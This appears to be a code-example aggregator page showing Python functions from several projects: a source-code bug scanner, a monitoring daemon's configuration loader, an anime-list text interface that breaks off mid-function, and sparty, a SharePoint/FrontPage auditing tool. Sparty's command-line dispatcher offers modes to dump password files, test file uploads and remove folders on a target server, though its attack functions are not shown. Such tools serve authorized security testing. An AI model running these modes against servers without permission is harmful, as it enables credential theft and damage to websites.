Source File: grepbugs.py
View license
def local_scan(srcdir, repo='none', account='local_scan', project='none', default_branch='none', no_reports=False):
	"""
	Perform a scan of local files
	"""
	# new scan so new scan_id
	scan_id = str(uuid.uuid1())
	clocsql = '/tmp/gb.cloc.' + scan_id + '.sql'
	basedir = os.path.dirname(os.path.abspath(__file__)) + '/' + srcdir.rstrip('/')
	logging.info('Using grep binary ' + grepbin)
	logging.info('Starting local scan with scan id ' + scan_id)

	# get db connection
	if 'mysql' == gbconfig.get('database', 'database'):
		try:
			import MySQLdb
			mysqldb  = MySQLdb.connect(host=gbconfig.get('database', 'host'), user=gbconfig.get('database', 'dbuname'), passwd=gbconfig.get('database', 'dbpword'), db=gbconfig.get('database', 'dbname'))
			mysqlcur = mysqldb.cursor()
		except Exception as e:
			print 'Error connecting to MySQL! See log file for details.'
			logging.debug('Error connecting to MySQL: ' + str(e))
			sys.exit(1)

	try:
		db  = lite.connect(dbfile)
		cur = db.cursor()

	except lite.Error as e:
		print 'Error connecting to db file! See log file for details.'
		logging.debug('Error connecting to db file: ' + str(e))
		sys.exit(1)
	except Exception as e:
		print 'CRITICAL: Unhandled exception occured! Quiters gonna quit! See log file for details.'
		logging.critical('Unhandled exception: ' + str(e))
		sys.exit(1)

	if args.u == True:
		print 'Scanning with existing rules set'
		logging.info('Scanning with existing rules set')
	else:
		# get latest greps
		download_rules()

	# prep db for capturing scan results
	try:
		# clean database
		cur.execute("DROP TABLE IF EXISTS metadata;");
		cur.execute("DROP TABLE IF EXISTS t;");
		cur.execute("VACUUM");

		# update database with new project info
		if 'none' == project:
			project = srcdir

		# query database
		params     = [repo, account, project]
		if 'mysql' == gbconfig.get('database', 'database'):
			mysqlcur.execute("SELECT project_id FROM projects WHERE repo=%s AND account=%s AND project=%s LIMIT 1;", params)
			rows = mysqlcur.fetchall()
		else:
			cur.execute("SELECT project_id FROM projects WHERE repo=? AND account=? AND project=? LIMIT 1;", params)
			rows = cur.fetchall()

		# assume new project by default
		newproject = True

		for row in rows:
			# not so fast, not a new project
			newproject = False
			project_id = row[0]

		if True == newproject:
			project_id = str(uuid.uuid1())
			params     = [project_id, repo, account, project, default_branch]
			if 'mysql' == gbconfig.get('database', 'database'):
				mysqlcur.execute("INSERT INTO projects (project_id, repo, account, project, default_branch) VALUES (%s, %s, %s, %s, %s);", params)
			else:
				cur.execute("INSERT INTO projects (project_id, repo, account, project, default_branch) VALUES (?, ?, ?, ?, ?);", params)

		# update database with new scan info
		params  = [scan_id, project_id]
		if 'mysql' == gbconfig.get('database', 'database'):
			mysqlcur.execute("INSERT INTO scans (scan_id, project_id) VALUES (%s, %s);", params)
			mysqldb.commit()
		else:
			cur.execute("INSERT INTO scans (scan_id, project_id) VALUES (?, ?);", params)
			db.commit()

	except Exception as e:
		print 'CRITICAL: Unhandled exception occured! Quiters gonna quit! See log file for details.'
		logging.critical('Unhandled exception: ' + str(e))
		sys.exit(1)

	# execute cloc to get sql output
	try:
		print 'counting source files...'
		logging.info('Running cloc for sql output.')
		return_code = call(["cloc", "--skip-uniqueness", "--quiet", "--sql=" + clocsql, "--sql-project=" + srcdir, srcdir])
		if 0 != return_code:
			logging.debug('WARNING: cloc did not run normally. return code: ' + str(return_code))

		# run sql script generated by cloc to save output to database
		f = open(clocsql, 'r')
		cur.executescript(f.read())
		db.commit()
		f.close()
		os.remove(clocsql)

	except Exception as e:
		print 'Error executing cloc sql! Aborting scan! See log file for details.'
		logging.debug('Error executing cloc sql (scan aborted). It is possible there were no results from running cloc.: ' + str(e))
		return scan_id

	# query cloc results
	cur.execute("SELECT Language, count(File), SUM(nBlank), SUM(nComment), SUM(nCode) FROM t GROUP BY Language ORDER BY Language;")
	
	rows    = cur.fetchall()
	cloctxt =  '-------------------------------------------------------------------------------' + "\n"
	cloctxt += 'Language                     files          blank        comment           code' + "\n"
	cloctxt += '-------------------------------------------------------------------------------' + "\n"
	
	sum_files   = 0
	sum_blank   = 0
	sum_comment = 0
	sum_code    = 0

	for row in rows:
		cloctxt += '{0:20}  {1:>12}  {2:>13} {3:>14} {4:>14}'.format(str(row[0]), str(row[1]), str(row[2]), str(row[3]), str(row[4])) + "\n"
		sum_files   += row[1]
		sum_blank   += row[2]
		sum_comment += row[3]
		sum_code    += row[4]
	
	cloctxt += '-------------------------------------------------------------------------------' + "\n"
	cloctxt += '{0:20}  {1:>12}  {2:>13} {3:>14} {4:>14}'.format('Sum', str(sum_files), str(sum_blank), str(sum_comment), str(sum_code)) + "\n"
	cloctxt += '-------------------------------------------------------------------------------' + "\n"

	# execute clock again to get txt output
	try:
		params = [cloctxt, scan_id]
		if 'mysql' == gbconfig.get('database', 'database'):
			mysqlcur.execute("UPDATE scans SET date_time=NOW(), cloc_out=%s WHERE scan_id=%s;", params)
			mysqldb.commit()
		else:
			cur.execute("UPDATE scans SET cloc_out=? WHERE scan_id=?;", params)
			db.commit()

	except Exception as e:
		print 'Error saving cloc txt! Aborting scan! See log file for details.'
		logging.debug('Error saving cloc txt (scan aborted): ' + str(e))
		return scan_id

	# load json data
	try:
		logging.info('Reading grep rules from json file.')
		json_file = open(gbfile, "r")
		greps     = json.load(json_file)
		json_file.close()
	except Exception as e:
		print 'CRITICAL: Unhandled exception occured! Quiters gonna quit! See log file for details.'
		logging.critical('Unhandled exception: ' + str(e))
		sys.exit(1)

	# query database
	cur.execute("SELECT DISTINCT Language FROM t ORDER BY Language;")
	rows = cur.fetchall()

	# grep all the bugs and output to file
	print 'grepping for bugs...'
	logging.info('Start grepping for bugs.')

	# get cloc extensions and create extension array
	clocext  = ''
	proc     = subprocess.Popen([clocbin, "--show-ext"], stdout=subprocess.PIPE)
	ext      = proc.communicate()
	extarray = str(ext[0]).split("\n")
	
	# override some extensions
	extarray.append('inc -> PHP')
	
	# loop through languages identified by cloc
	for row in rows:
		count = 0
		# loop through all grep rules for each language identified by cloc
		for i in range(0, len(greps)):
				# if the language matches a language in the gb rules file then do stuff
				if row[0] == greps[i]['language']:

					# get all applicable extensions based on language
					extensions = []
					for ii in range(0, len(extarray)):
						lang = str(extarray[ii]).split("->")
						if len(lang) > 1:							
							if str(lang[1]).strip() == greps[i]['language']:
								extensions.append(str(lang[0]).strip())

					# search with regex, filter by extensions, and capture result
					result = ''
					filter = []

					# build filter by extension
					for e in extensions:
						filter.append('--include=*.' + e)

					try:
						proc   = subprocess.Popen([grepbin, "-n", "-r", "-P"] +  filter + [greps[i]['regex'], srcdir], stdout=subprocess.PIPE)
						result = proc.communicate()

						if len(result[0]):	
							# update database with new results info
							result_id = str(uuid.uuid1())
							params    = [result_id, scan_id, greps[i]['language'], greps[i]['id'], greps[i]['regex'], greps[i]['description']]
							if 'mysql' == gbconfig.get('database', 'database'):
								mysqlcur.execute("INSERT INTO results (result_id, scan_id, language, regex_id, regex_text, description) VALUES (%s, %s, %s, %s, %s, %s);", params)
								mysqldb.commit()
							else:
								cur.execute("INSERT INTO results (result_id, scan_id, language, regex_id, regex_text, description) VALUES (?, ?, ?, ?, ?, ?);", params)
								db.commit()

							perline = str(result[0]).split("\n")
							for r in range(0, len(perline) - 1):
								try:
									rr = str(perline[r]).replace(basedir, '').split(':', 1)
									# update database with new results_detail info
									result_detail_id = str(uuid.uuid1())
									code             = str(rr[1]).split(':', 1)
									params           = [result_detail_id, result_id, rr[0], code[0], str(code[1]).strip()]

									if 'mysql' == gbconfig.get('database', 'database'):
										mysqlcur.execute("INSERT INTO results_detail (result_detail_id, result_id, file, line, code) VALUES (%s, %s, %s, %s, %s);", params)
										mysqldb.commit()
									else:
										cur.execute("INSERT INTO results_detail (result_detail_id, result_id, file, line, code) VALUES (?, ?, ?, ?, ?);", params)
										db.commit()

								except lite.Error, e:
									print 'SQL error! See log file for details.'
									logging.debug('SQL error with params ' + str(params) + ' and error ' + str(e))
								except Exception as e:
									print 'Error parsing result! See log file for details.'
									logging.debug('Error parsing result: ' + str(e))
							
					except Exception as e:
						print 'Error calling grep! See log file for details'
						logging.debug('Error calling grep: ' + str(e))

	params = [project_id]
	if 'mysql' == gbconfig.get('database', 'database'):
		mysqlcur.execute("UPDATE projects SET last_scan=NOW() WHERE project_id=%s;", params)
		mysqldb.commit()
		mysqldb.close()
	else:
		cur.execute("UPDATE projects SET last_scan=datetime('now') WHERE project_id=?;", params)
		db.commit()
		db.close()

	if not no_reports:
		html_report(scan_id)

	return scan_id

Example 42

Project: sparty
Source File: sparty_v_0.1.py
View license
def main():
    check_python()
    banner()

    parser = optparse.OptionParser(usage="usage: %prog [options]", version="%prog 1.0")

    front_page = optparse.OptionGroup(parser,"Frontpage:")
    share_point = optparse.OptionGroup(parser,"Sharepoint:")
    mandatory = optparse.OptionGroup(parser,"Mandatory:")
    exploit = optparse.OptionGroup(parser,"Information Gathering and Exploit:")
    authentication = optparse.OptionGroup(parser,"Authentication [devalias.net]")
    general = optparse.OptionGroup(parser,"General:")

    mandatory.add_option("-u","--url", type="string" , help="target url to scan with proper structure", dest="url")
    front_page.add_option("-f", "--frontpage", type="choice", choices=['pvt' ,'bin'], help="<FRONTPAGE = pvt | bin> -- to check access permissions on frontpage standard files in vti or bin directory!", dest="frontpage")
    share_point.add_option("-s","--sharepoint", type="choice", choices=['forms','layouts','catalog'], help="<SHAREPOINT = forms | layouts | catalog> -- to check access permissions on sharepoint standard files in forms or layouts or catalog directory!", dest="sharepoint")

    exploit.add_option("-v","--http_fingerprint", type="choice", choices=['ms_sharepoint','ms_frontpage'], help="<FINGERPRINT = ms_sharepoint | ms_frontpage> -- fingerprint sharepoint or frontpage based on HTTP headers!" , dest="fingerprint")
    exploit.add_option("-d","--dump", type="choice", choices=['dump', 'extract'] , help="<DUMP = dump | extract> -- dump credentials from default sharepoint and frontpage files (configuration errors and exposed entries)!", dest="dump")
    exploit.add_option("-l","--list", type="choice", choices=['list','index'], help="<DIRECTORY = list | index> -- check directory listing and permissions!", dest="directory")
    exploit.add_option("-e","--exploit", type="choice", choices=['rpc_version_check','rpc_service_listing', 'author_config_check','rpc_file_upload','author_remove_folder'], help="EXPLOIT = <rpc_version_check | rpc_service_listing | rpc_file_upload | author_config_check | author_remove_folder> -- exploit vulnerable installations by checking RPC querying, service listing and file uploading", dest="exploit")
    exploit.add_option("-i","--services", type="choice", choices=['serv','services'], help="SERVICES = <serv | services> -- checking exposed services !", dest="services")

    authentication.add_option("-a","--auth-type", type="choice", choices=['ntlm'], help="AUTHENTICATION = <ntlm> -- Authenticate with NTLM user/pass !", dest="authentication")

    general.add_option("-x","--examples", type="string",help="running usage examples !", dest="examples")

    parser.add_option_group(front_page)
    parser.add_option_group(share_point)
    parser.add_option_group(mandatory)
    parser.add_option_group(exploit)
    parser.add_option_group(authentication)
    parser.add_option_group(general)

    options, arguments = parser.parse_args()

    try:
        target = options.url

        # devalias.net - Authentication
        if options.authentication == "ntlm":
            enable_ntlm_authentication("", "", target) # Leave user/pass blank to prompt user
            # TODO: Enable commandline user/pass?

        if target is not None:
            target_information(target)
        else:
            print "[-] specify the options. use (-h) for more help!"
            sys.exit(0)

        if options.dump=="dump" or options.dump == "extract":
                        print "\n[+]------------------------------------------------------------------------------------------------!"
                        print "[+] dumping (service.pwd | authors.pwd | administrators.pwd | ws_ftp.log) files if possible!"
                        print "[+]--------------------------------------------------------------------------------------------------!\n"
                        dump_credentials(target)
                        module_success("password dumping")
                        return

        elif options.exploit == "rpc_version_check":
                        print "\n[+]-----------------------------------------------------------------------!"
                        print "[+] auditing frontpage RPC service                                          !"
                        print "[+]-------------------------------------------------------------------------!\n"
                        frontpage_rpc_check(target)
                        module_success("module RPC version check")
                        return

        elif options.exploit == "rpc_service_listing":
                        print "\n[+]-----------------------------------------------------------------------!"
                        print "[+] auditing frontpage RPC service for fetching listing                     !"
                        print "[+]-------------------------------------------------------------------------!\n"
                        frontpage_service_listing(target)
                        module_success("module RPC service listing check")
                        return

        elif options.exploit == "author_config_check":
                        print "\n[+]-----------------------------------------------------------------------!"
                        print "[+] auditing frontpage configuration settings                               !"
                        print "[+]-------------------------------------------------------------------------!\n"
                        frontpage_config_check(target)
                        module_success("module RPC check")
                        return

        elif options.exploit == "author_remove_folder":
                        print "\n[+]-----------------------------------------------------------------------!"
                        print "[+] trying to remove folder from web server                                 !"
                        print "[+]-------------------------------------------------------------------------!\n"
                        frontpage_remove_folder(target)
                        module_success("module remove folder check")
                        return


        elif options.exploit == "rpc_file_upload":
                print "\n[+]-----------------------------------------------------------------------!"
                print "[+] auditing file uploading misconfiguration                                !"
                print "[+]-------------------------------------------------------------------------!\n"
                file_upload_check(target)
                module_success("module file upload check")
                return


        elif options.examples == "examples":
                sparty_usage(target)
                return

        elif options.directory == "list" or options.directory == "index":
            build_target(target,directory_check,dir_target)
            print "\n[+]-----------------------------------------------------------------------!"
            print "[+] auditing frontpage directory permissions (forbidden | index | not exist)!"
            print "[+]-------------------------------------------------------------------------!\n"
            audit(dir_target)
            module_success("directory check")
            return

        elif options.frontpage == "bin":
            build_target(target,front_bin,refine_target)
            print "\n[+]----------------------------------------!"
            print "[+] auditing frontpage '/_vti_bin/' directory!"
            print "[+]------------------------------------------!\n"
            audit(refine_target)
            module_success("bin file access")

        elif options.frontpage == "pvt":
            build_target(target,front_pvt,pvt_target)
            print "\n[+]---------------------------------------------------------!"
            print "[+] auditing '/_vti_pvt/' directory for sensitive information !"
            print "[+]-----------------------------------------------------------!\n"
            audit(pvt_target)
            module_success("pvt file access")
            return

        elif options.fingerprint == "ms_sharepoint":
            dump_sharepoint_headers(target)
            print "\n[+] sharepoint fingerprinting module completed !\n"
            return


        elif options.fingerprint == "ms_frontpage":
            fingerprint_frontpage(target)
            print "\n[+] frontpage fingerprinting module completed !\n"
            return

        elif options.sharepoint == "layouts":
            build_target(target,sharepoint_check_layout,sharepoint_target_layout)
            print "\n[+]-----------------------------------------------------------------!"
            print "[+] auditing sharepoint '/_layouts/' directory for access permissions !"
            print "[+]-------------------------------------------------------------------!\n"
            audit(sharepoint_target_layout)
            module_success("layout file access")
            return

        elif options.sharepoint == "forms":
            build_target(target,sharepoint_check_forms,sharepoint_target_forms)
            print "\n[+]--------------------------------------------------------------!"
            print "[+] auditing sharepoint '/forms/' directory for access permissions !"
            print "[+]----------------------------------------------------------------!\n"
            audit(sharepoint_target_forms)
            module_success("forms file access")
            return

        elif options.sharepoint == "catalog":
            build_target(target,sharepoint_check_catalog,sharepoint_target_catalog)
            print "\n[+]--------------------------------------------------------------!"
            print "[+] auditing sharepoint '/catalog/' directory for access permissions !"
            print "[+]----------------------------------------------------------------!\n"
            audit(sharepoint_target_catalog)
            module_success("catalogs file access")
            return

        elif options.services == "serv" or options.services == "services":
            build_target(target,front_services,refine_target)
            print "\n[+]---------------------------------------------------------------!"
            print "[+] checking exposed services in the frontpage/sharepoint  directory!"
            print "[+]-----------------------------------------------------------------!\n"
            audit(refine_target)
            module_success("exposed services check")


        else:
            print "[-] please provide the proper scanning options!"
            print "[+] check help (-h) for arguments and url specification!"
            sys.exit(0)

    except ValueError as v:
        print "[-] ValueError occurred. Improper option argument or url!"
        print "[+] check for help (-h) for more details!"
        sys.exit(0)

    except TypeError as t:
        print "[-] TypeError occcured. Missing option argument or url!"
        print "[+] check for help (-h) for more details!"
        sys.exit(0)

    except IndexError as e:
        sparty_usage()
        sys.exit(0)

    except urllib2.HTTPError as h:
        print "[-] HTTPError : %s" %h.code
        print "[+] please specify the target with protocol handlers as http | https"
        sys.exit(0)

    except urllib2.URLError as u:
        print "[-] URLError : %s" %u.args
        print "[+] please specify the target with protocol handlers as http | https"
        sys.exit(0)

    except KeyboardInterrupt:
        print "[-] halt signal detected, exiting the program !\n"
        sys.exit(0)


    except None:
        print "[] Hey"
        sys.exit(0)

Example 43

Project: alignak
Source File: arbiterdaemon.py
View license
    def load_monitoring_config_file(self):  # pylint: disable=R0915
        """Load main configuration file (alignak.cfg)::

        * Read all files given in the -c parameters
        * Read all .cfg files in cfg_dir
        * Read all files in cfg_file
        * Create objects (Arbiter, Module)
        * Set HTTP links info (ssl etc)
        * Load its own modules
        * Execute read_configuration hook (for arbiter modules)
        * Create all objects (Service, Host, Realms ...)
        * "Compile" configuration (Linkify, explode, apply inheritance, fill default values ...)
        * Cut conf into parts and prepare it for sending

        :return: None
        """
        if self.verify_only:
            # Force the global logger at INFO level
            alignak_logger = logging.getLogger("alignak")
            alignak_logger.setLevel(logging.INFO)
            logger.info("Arbiter is in configuration check mode")
            logger.info("-----")

        logger.info("Loading configuration")
        # REF: doc/alignak-conf-dispatching.png (1)
        buf = self.conf.read_config(self.config_files)
        raw_objects = self.conf.read_config_buf(buf)
        # Maybe conf is already invalid
        if not self.conf.conf_is_correct:
            err = "***> One or more problems was encountered while processing the config files..."
            logger.error(err)
            # Display found warnings and errors
            self.conf.show_errors()
            sys.exit(err)

        logger.info("I correctly loaded the configuration files")

        # First we need to get arbiters and modules
        # so we can ask them for objects
        self.conf.create_objects_for_type(raw_objects, 'arbiter')
        self.conf.create_objects_for_type(raw_objects, 'module')

        self.conf.early_arbiter_linking()

        # Search which Arbiterlink I am
        for arb in self.conf.arbiters:
            if arb.get_name() in ['Default-Arbiter', self.config_name]:
                arb.need_conf = False
                self.myself = arb
                self.is_master = not self.myself.spare
                if self.is_master:
                    logger.info("I am the master Arbiter: %s", arb.get_name())
                else:
                    logger.info("I am a spare Arbiter: %s", arb.get_name())
                # export this data to our statsmgr object :)
                statsd_host = getattr(self.conf, 'statsd_host', 'localhost')
                statsd_port = getattr(self.conf, 'statsd_port', 8125)
                statsd_prefix = getattr(self.conf, 'statsd_prefix', 'alignak')
                statsd_enabled = getattr(self.conf, 'statsd_enabled', False)
                statsmgr.register(arb.get_name(), 'arbiter',
                                  statsd_host=statsd_host, statsd_port=statsd_port,
                                  statsd_prefix=statsd_prefix, statsd_enabled=statsd_enabled)

                # Set myself as alive ;)
                self.myself.alive = True
            else:  # not me
                arb.need_conf = True

        if not self.myself:
            sys.exit("Error: I cannot find my own Arbiter object (%s), I bail out. "
                     "To solve this, please change the arbiter_name parameter in "
                     "the arbiter configuration file (certainly arbiter-master.cfg) "
                     "with the value '%s'."
                     " Thanks." % (self.config_name, socket.gethostname()))

        # Ok it's time to load the module manager now!
        self.load_modules_manager()
        # we request the instances without them being *started*
        # (for those that are concerned ("external" modules):
        # we will *start* these instances after we have been daemonized (if requested)
        self.do_load_modules(self.myself.modules)

        # Call modules that manage this read configuration pass
        self.hook_point('read_configuration')

        # Call modules get_objects() to load new objects from them
        # (example modules: glpi, mongodb, dummy_arbiter)
        self.load_modules_configuration_objects(raw_objects)

        # Resume standard operations
        self.conf.create_objects(raw_objects)

        # Maybe conf is already invalid
        if not self.conf.conf_is_correct:
            err = "***> One or more problems was encountered while processing the config files..."
            logger.error(err)
            # Display found warnings and errors
            self.conf.show_errors()
            sys.exit(err)

        # Manage all post-conf modules
        self.hook_point('early_configuration')

        # Load all file triggers
        self.conf.load_triggers()

        # Create Template links
        self.conf.linkify_templates()

        # All inheritances
        self.conf.apply_inheritance()

        # Explode between types
        self.conf.explode()

        # Implicit inheritance for services
        self.conf.apply_implicit_inheritance()

        # Fill default values
        self.conf.fill_default()

        # Remove templates from config
        self.conf.remove_templates()

        # Overrides specific service instances properties
        self.conf.override_properties()

        # Linkify objects to each other
        self.conf.linkify()

        # applying dependencies
        self.conf.apply_dependencies()

        # Hacking some global parameters inherited from Nagios to create
        # on the fly some Broker modules like for status.dat parameters
        # or nagios.log one if there are none already available
        self.conf.hack_old_nagios_parameters()

        # Raise warning about currently unmanaged parameters
        if self.verify_only:
            self.conf.warn_about_unmanaged_parameters()

        # Explode global conf parameters into Classes
        self.conf.explode_global_conf()

        # set our own timezone and propagate it to other satellites
        self.conf.propagate_timezone_option()

        # Look for business rules, and create the dep tree
        self.conf.create_business_rules()
        # And link them
        self.conf.create_business_rules_dependencies()

        # Warn about useless parameters in Alignak
        if self.verify_only:
            self.conf.notice_about_useless_parameters()

        # Manage all post-conf modules
        self.hook_point('late_configuration')

        # Configuration is correct?
        self.conf.is_correct()

        # Maybe some elements were not wrong, so we must clean if possible
        self.conf.clean()

        # If the conf is not correct, we must get out now (do not try to split the configuration)
        if not self.conf.conf_is_correct:
            err = "Configuration is incorrect, sorry, I bail out"
            logger.error(err)
            # Display found warnings and errors
            self.conf.show_errors()
            sys.exit(err)

        # REF: doc/alignak-conf-dispatching.png (2)
        logger.info("Splitting hosts and services into parts")
        self.confs = self.conf.cut_into_parts()

        # The conf can be incorrect here if the cut into parts see errors like
        # a realm with hosts and no schedulers for it
        if not self.conf.conf_is_correct:
            err = "Configuration is incorrect, sorry, I bail out"
            logger.error(err)
            # Display found warnings and errors
            self.conf.show_errors()
            sys.exit(err)

        logger.info('Things look okay - No serious problems were detected '
                    'during the pre-flight check')

        # Clean objects of temporary/unnecessary attributes for live work:
        self.conf.clean()

        # Exit if we are just here for config checking
        if self.verify_only:
            logger.info("Arbiter checked the configuration")
            # Display found warnings and errors
            self.conf.show_errors()
            sys.exit(0)

        if self.analyse:
            self.launch_analyse()
            sys.exit(0)

        # Some properties need to be "flatten" (put in strings)
        # before being sent, like realms for hosts for example
        # BEWARE: after the cutting part, because we stringify some properties
        self.conf.prepare_for_sending()

        # Ignore daemon configuration parameters (port, log, ...) in the monitoring configuration
        # It's better to use daemon default parameters rather than host found in the monitoring
        # configuration...

        self.accept_passive_unknown_check_results = BoolProp.pythonize(
            getattr(self.myself, 'accept_passive_unknown_check_results', '0')
        )

        #  We need to set self.host & self.port to be used by do_daemon_init_and_start
        self.host = self.myself.address
        self.port = self.myself.port

        logger.info("Configuration Loaded")

        # Still a last configuration check because some things may have changed when
        # we prepared the configuration for sending
        if not self.conf.conf_is_correct:
            err = "Configuration is incorrect, sorry, I bail out"
            logger.error(err)
            # Display found warnings and errors
            self.conf.show_errors()
            sys.exit(err)

        # Display found warnings and errors
        self.conf.show_errors()

Example 44

Project: Futaam
Source File: text.py
View license
def main(argv, version):
    """The text interface's main method."""
    global PS1
    ANNInitRet = ANN.init()
    if ANNInitRet == 0:
        pass
    elif ANNInitRet == 1:
        print(COLORS.header + 'Updating metadata...' + COLORS.default)
        ANN.fetch_report(50)
    elif ANNInitRet == 2:
        print(COLORS.header + 'Updating ANN metadata cache for the first time...' + COLORS.default)
        ANN.fetch_report('all')
	
    # gather arguments
    dbfile = ARGS.database
    host = ''
    if ARGS.host:
        host = ARGS.host
    password = ''
    if ARGS.password:
        password = ARGS.password
    username = ''
    if ARGS.username:
        username = ARGS.username
    port = 8500
    if ARGS.port:
        port = ARGS.port
    hooks = []
    if ARGS.hooks:
        hooks = ARGS.hooks

    if len(dbfile) == 0 and host == '':
        print(COLORS.fail + 'No database specified' + COLORS.default)
        print('To create a database, use the argument "--create" or "-c"' +\
		'(no quotes)')
        sys.exit(1)

    if host == '':
        dbs = []
        for filename in dbfile:
            dbs.append(parser.Parser(filename, hooks=hooks))
        currentdb = 0
    else:
        if username == '':
            if 'default.user' in CONFS:
                print('[' + COLORS.blue + 'info' + COLORS.default +\
				'] using default user')
                username = CONFS['default.user']
            else:
                username = input('Username for \'' + host + '\': ')
        if 'default.password' in CONFS:
            print('[' + COLORS.blue + 'info' + COLORS.default +\
            '] using default password')
            password = CONFS['default.password']
        else:
            password = getpass.getpass(
                'Password for \'' + username + '@' + host + '\': ')
        dbs = []
        try:
            dbs.append(
                parser.Parser(host=host, port=port, username=username,
				password=password, hooks=hooks))
        except Exception as exception:
            print('[' + COLORS.fail + 'error' + COLORS.default + '] ' +\
			str(exception).replace('305 ', ''))
            sys.exit(1)

        currentdb = 0

    print(COLORS.header + dbs[currentdb].dictionary['name'] + COLORS.default +\
	' (' + dbs[currentdb].dictionary['description'] + ')')
    print('Type help for cheat sheet')
    if len(dbs) > 1:
        print('Type switchdb to change to the next database')
    sys.stdout.write('\n')

    while True:
        try:
            now = datetime.datetime.now()
            ps1_replace = {'%N': dbs[currentdb].dictionary['name'], '%D':
			dbs[currentdb].dictionary['description'], '%h': now.strftime('%H'),
			'%m': now.strftime('%M'), chr(37) + 's': now.strftime(
            '%S'), '%blue%': COLORS.blue, '%green%': COLORS.green, '%red%':
			COLORS.fail, '%orange%': COLORS.warning, '%purple%': COLORS.header,
			'%default%': COLORS.default}
            ps1_temp = PS1
            ps1_temp = ps1_temp.replace('\%', '%' + chr(5))
            for replacer in ps1_replace:
                ps1_temp = ps1_temp.replace(replacer, ps1_replace[replacer])
            ps1_temp = ps1_temp.replace(chr(5), '')
            cmd = input(ps1_temp + COLORS.default).lstrip()
            cmdsplit = cmd.split(' ')
            args = ''
            for arg in cmdsplit[1:]:
                args += arg + ' '
            args = args[:-1].replace('\n', '')
        except (EOFError, KeyboardInterrupt):
            print(COLORS.green + 'Bye~' + COLORS.default)
            sys.exit(0)

        if cmdsplit[0].lower() in ['q', 'quit']:
            print(COLORS.green + 'Bye~' + COLORS.default)
            sys.exit(0)
        elif cmdsplit[0].lower() in ['set_ps1', 'sps1']:
            args += ' '

            CONFS['PS1'] = args
            with open(CONFPATH, 'wb') as conf_file:
                conf_file.write(json.dumps(CONFS))
                conf_file.close()
            PS1 = args
        elif cmdsplit[0].lower() in ['help', 'h']:
            print(COLORS.header + 'Commands' + COLORS.default)
            print('\thelp or h \t\t - prints this')
            print('\tquit or q \t\t - quits')
            print('\tset_ps1 or sps1 \t - changes PS1')
            print('\tswitchdb or sdb \t - changes working database when' +\
			'opened with multiple files')
            print('\tadd or a \t\t - adds an entry')
            print('\tlist or ls\t\t - lists all entries')
            print('\tdelete, del or d \t - deletes an entry with the given' +\
			'index')
            print('\tedit or e \t\t - edits an entry')
            print('\tinfo or i\t\t - shows information on an entry')
            print('\toinfo or o\t\t - shows online information on an entry' +\
			'(if given entry number) or name')
            print('\tpicture, pic, image, img - shows an image of the entry' +\
			'or name')
            print('\tnyaa or n\t\t - searches nyaa.eu for torrent of an' +\
			'entry (if given entry number) or name')
            print('\tsort or s\t\t - swaps or moves entries around')
            print('\tfilter, f or search\t - searches the database (by' +\
			'name/genre/obs/type/lastwatched)')
            print('')
        elif cmdsplit[0].lower() in ['switchdb', 'sdb']:
            try:
                currentdb += 1
                repr(dbs[currentdb])
            except IndexError:
                currentdb = 0
            print('Current database: ' + COLORS.header + dbs[
			currentdb].dictionary['name'] + COLORS.default + ' (' + dbs[
			currentdb].dictionary['description'] + ')')
        elif cmdsplit[0].lower() in ['l', 'ls', 'list']:
            if len(dbs[currentdb].dictionary['items']) == 0:
                print(COLORS.warning +\
				'No entries found! Use "add" for adding one' + COLORS.default)
                continue
            else:
                for entry in sorted(dbs[currentdb].dictionary['items'],
				key=lambda x: x['id']):
                    rcolors = {'d': COLORS.fail, 'c': COLORS.blue, 'w':
                     COLORS.green, 'h': COLORS.warning, 'q': COLORS.header}

                    if entry['status'].lower() in rcolors:
                        sys.stdout.write(rcolors[entry['status'].lower()])
                    if os.name != 'nt':
                        print('\t' + str(entry['id']) + ' - [' +\
						entry['status'].upper() + '] ' + entry['name'] +\
						COLORS.default)
                    else:
                        print('\t' + str(entry['id']) +\
						' - [' + entry['status'].upper() + '] ' +\
						entry['name'].encode('ascii', 'ignore') +\
						COLORS.default)
        elif cmdsplit[0].lower() in ['search', 'filter', 'f']:
            if len(cmdsplit) < 3:
                print('Usage: ' + cmdsplit[0] + ' <filter> <terms>')
                print('Where <filter> is' +\
				'name/genre/lastwatched/status/obs/type')
            else:
                if cmdsplit[1].lower() in ['name', 'genre', 'lastwatched',
				'status', 'obs', 'type']:
                    for entry in sorted(dbs[currentdb].dictionary['items'], \
					key=lambda x: x['id']):
                        if ' '.join(cmdsplit[2:]).lower() in \
						entry[cmdsplit[1].lower()].lower():
                            rcolors = {'d': COLORS.fail, 'c': COLORS.blue, 'w':
                                       COLORS.green, 'h': COLORS.warning, 'q':
									   COLORS.header}

                            if entry['status'].lower() in rcolors:
                                sys.stdout.write(
                                    rcolors[entry['status'].lower()])
                            if os.name != 'nt':
                                print('\t' + str(entry['id']) + ' - [' +\
								entry['status'].upper() + '] ' +\
								entry['name'] + COLORS.default)
                            else:
                                print('\t' + str(entry['id']) + ' - [' +\
								entry['status'].upper() + '] ' +\
								entry['name'].encode('ascii', 'ignore') +\
								COLORS.default)
                else:
                    print('Usage: ' + cmdsplit[0] + ' <filter> <terms>')
                    print('Where <filter> is name/genre/lastwatched/status/obs')
        elif cmdsplit[0].lower() in ['d', 'del', 'delete']:
            entry = pick_entry(args, dbs[currentdb])
            if entry == None:
                continue
            confirm = ''
            while (confirm in ['y', 'n']) == False:
                confirm = input(
                    COLORS.warning + 'Are you sure? [y/n] ' +\
					COLORS.default).lower()
            dbs[currentdb].dictionary['items'].remove(entry)
            dbs[currentdb].dictionary['count'] -= 1

            rebuild_ids(dbs[currentdb])

        elif cmdsplit[0].lower() in ['image', 'img', 'picture', 'pic', 'pix']:
            accepted = False
            if args.isdigit():
                if args >= 0 and len(dbs[currentdb].dictionary['items']) >=\
                int(args):
                    eid = dbs[currentdb].dictionary['items'][int(
                    args)]['aid']
                    etype = dbs[currentdb].dictionary[
                    'items'][int(args)]['type']
                    accepted = True
                else:
                    print(COLORS.fail + 'The entry ' + args +\
				    ' is not on the list' + COLORS.default)
            else:
                title = args

                entry_type = ''
                while (entry_type in ['anime', 'manga', 'vn']) == False:
                    entry_type = input(
                    COLORS.bold + '<Anime, Manga or VN> ' +\
                    COLORS.default).lower()

                if entry_type in ['anime', 'manga']:
                    search_results = ANN.search(title, entry_type)
                elif entry_type == 'vn':
                    search_results = VNDB.get(
                   'vn', 'basic', '(title~"' + title + '")', '')['items']
                if os.name == 'nt':
                    for result in search_results:
                        for key in result:
                            result[key] = result[key].encode('ascii',
                            'ignore')
                i = 0
                for result in search_results:
